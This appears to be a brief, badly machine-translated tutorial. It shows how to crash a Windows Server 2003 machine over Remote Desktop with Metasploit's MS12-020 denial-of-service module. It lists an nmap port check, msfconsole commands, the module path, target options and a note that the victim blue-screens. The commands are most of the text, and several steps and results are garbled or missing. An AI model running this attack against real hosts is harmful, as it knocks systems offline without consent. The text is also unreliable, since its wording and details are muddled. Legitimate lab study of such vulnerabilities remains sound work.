MSF use penetration testing framework to achieve a blue screen:
Experimental environment:
Attack: kali Linux
drone: Windows 2007 Server 2003 or Windows
1, nmap probe to ensure that the victims were open Remote Desktop Services (RDU) (port number: 3389), may also be connected with a remote computer try. Such as:
detection results:
2, opening into the attack machine --kali linux msfconsole
. 3, open vulnerability scanning module:
Search # ms12-020 follows:
4, we can see by querying several modules, through:
use Auxiliary / DOS / Windows / RDP / ms12_020_maxchannelids # into the module, the grammatical structure: use Module
us: show options # query module inside the parameters:
the SET rhosts victims set victims ip address ip #:
rhosts victim # ip
rhport # target port
can be: not a good show options # query module inside the parameters set
5, began to attack using the exploit. Drone can see a blue screen: